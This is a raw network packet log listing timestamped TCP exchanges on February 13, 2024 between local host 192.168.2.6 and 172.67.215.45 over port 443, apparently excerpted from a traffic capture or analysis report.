Feb 13, 2024 21:13:55.056085110 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.056092978 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.056493044 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.056510925 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.056545019 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.056551933 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.056569099 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.056582928 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.056582928 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.056612968 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.056619883 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.056766033 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.057148933 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.057164907 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.057203054 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.057213068 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.057228088 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.057269096 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.057282925 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.057328939 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.057341099 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.058056116 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.058073997 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.058151960 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.058159113 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.058166027 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.058177948 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.058199883 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.058223009 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.058243990 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.058258057 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.058304071 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.058304071 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.058314085 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.058412075 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.059107065 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.059122086 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.059168100 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.059175014 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.059206009 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.059206009 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.059283972 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.059297085 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.059350967 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.059350967 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.059360981 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.059401989 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.059932947 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.059948921 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.059990883 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.060007095 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.060337067 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.060367107 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.060379028 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.060466051 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.060472012 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.060606003 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.060620070 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.060641050 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.060647011 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.060669899 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.060669899 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.060698032 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.060795069 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.060807943 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.060842991 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.060857058 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.060945034 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.061464071 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.061477900 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.061539888 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.061549902 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.061594009 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.061670065 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.061681986 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.061722994 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.061728954 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.061758995 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.061758995 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.080552101 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.080574989 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.080740929 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.080760956 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.080786943 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.080806971 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.080914021 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.080926895 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.080996037 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.080996037 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.081002951 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.081012964 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.081032038 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.081144094 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.081151009 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.081602097 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.081617117 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.081707954 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.081713915 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.081794977 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.081811905 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.081845045 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.081851006 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.081872940 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.082205057 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.082220078 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.082282066 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.082282066 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.082289934 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.082472086 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.082492113 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.082546949 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.082546949 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.082554102 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.083791971 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.083806038 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.083842993 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.083849907 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.083868027 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.084006071 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.084023952 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.084067106 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.084073067 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.084083080 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.085311890 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.085326910 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.085376978 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.085380077 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.085380077 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.085390091 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.085407972 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.085419893 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.085457087 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.085463047 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.085481882 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.085534096 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.087167978 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.087186098 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.087244987 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.087244987 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.087251902 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.087289095 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.087352037 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.087373018 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.087416887 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.087423086 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.087479115 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.087507010 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.087532043 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.087574959 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.087580919 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.087590933 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.087613106 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.087811947 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.087829113 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.087933064 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.087940931 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.088016033 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.089678049 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.089698076 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.089730024 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.089735985 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.089757919 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.089780092 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.089857101 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.089873075 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.089904070 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.089915037 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.089943886 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.089943886 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.090152979 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.090173006 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.090226889 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.090226889 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.090234041 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.090261936 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.090348959 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.090369940 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.090429068 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.090429068 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.090436935 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.090512037 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.091922045 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.091936111 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.091969967 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.091975927 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.092004061 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.092004061 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.092839003 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.092853069 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.092951059 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.092957020 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.093000889 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.093019962 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.093031883 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.093039036 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.093079090 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.093079090 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.093450069 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.093467951 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.093754053 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.093765020 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.093874931 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.094595909 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.094609976 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.094662905 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.094671965 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.095694065 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.095932961 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.095948935 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.095983982 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.096002102 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.096194983 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.096595049 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.096609116 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.096657038 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.096657038 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.096663952 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.096735954 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.096839905 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.096854925 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.096889973 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.096904993 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.097031116 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.098067045 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.098087072 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.098124027 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.098136902 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.098265886 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.098731995 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.098754883 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.098808050 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.098814011 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.098869085 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.099065065 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.099095106 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.099149942 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.099149942 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.099155903 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.099240065 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.100931883 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.100946903 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.101049900 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.101058960 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.101466894 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.102380991 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.102395058 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.102428913 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.102436066 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.102483988 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.103173971 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.103199959 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.103256941 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.103256941 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.103266001 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.103316069 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.103418112 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.103435040 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.103494883 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.103494883 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.103507996 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.103564978 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.104554892 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.104574919 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.104620934 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.104635954 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.104646921 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.104665995 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.104693890 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.104693890 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.104701042 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.104747057 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.104747057 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.105966091 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.105982065 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.106038094 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.106038094 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.106045008 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.106091022 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.106270075 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.106285095 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.106353045 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.106359005 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.106451035 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.107333899 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.107351065 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.107429028 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.107439041 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.107477903 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.107598066 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.107614994 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.107649088 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.107656002 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.107688904 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.107688904 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.108549118 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.108563900 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.108597040 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.108609915 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.108637094 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.108637094 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.108664036 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.108680964 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.108737946 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.108737946 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.108743906 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.108778000 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.110649109 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.110666037 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.110728025 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.110728025 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.110735893 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.110769987 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.110924006 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.110944033 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.111001015 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.111001015 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.111008883 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.111058950 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.111447096 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.111462116 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.111505032 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.111511946 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.111546993 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.111561060 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.111567020 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.111607075 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.111607075 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.111625910 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.111665010 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.111686945 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.111717939 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.112915993 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.112931013 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.112979889 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.112987041 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.113013029 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.113073111 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.113231897 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.113248110 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.113317966 CET	443	49701	172.67.215.45	192.168.2.6
